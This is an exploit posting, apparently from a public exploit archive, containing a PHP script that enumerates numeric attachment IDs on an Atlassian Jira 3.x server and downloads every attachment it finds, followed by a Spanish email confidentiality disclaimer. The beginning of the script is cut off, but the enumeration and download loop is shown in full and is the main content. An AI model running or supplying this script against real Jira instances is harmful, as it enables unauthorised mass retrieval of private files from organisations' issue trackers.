======================================= Jira Atlassian File Attachment Download ======================================= # Exploit Title: Jira Atlassian # Date: 28/3/2010 # Author: Ignacio Garrido # Mail: Ign.sec gmail com # Software Link: http://www.atlassian.com/software/jira/JIRADownloadCenter.jspa # Version: 3.X (Maybe 4.X) # Tested on: Windos & Linux # Code : = $argv[3]) { echo "\n\n#The second number must be bigger than the first one\n"; die; } $numero = $argv[2]; for ($numero;$numero <= $argv[3];$numero++) { $head = get_headers("$url$numero/"); if (substr ($head[0],9,3) == "404") { echo "\n#File number $numero not found! (404)\n"; } else{ $explodeo = explode("filename*=",$head[2]); $explodeo2 = explode(";",$explodeo[1]); $archivo = substr($explodeo2[0],7); echo "\n#Downloading file: $archivo\n"; $file=file_get_contents("$url$numero/$archivo"); file_put_contents($archivo,$file); } } echo "\n#All attachment downloaded correctly!\n"; die; ?> -- *DISCLAIMER:* *El presente mensaje y todos los archivos adjuntos son confidenciales y para uso exclusivo del destinatario o entidad a la cual fue enviado. La divulgación de cualquier tipo de información contenida en el mismo es sancionada por la ley. Si ha recibido esta comunicación por error o en caso de no ser usted uno de los destinatarios, por favor le pedimos que elimine el correo de su sistema y se ponga en contacto con el remitente. Toda aseveración, confirmación, afirmación u opinión plasmada en este mensaje es propia del autor del mismo.*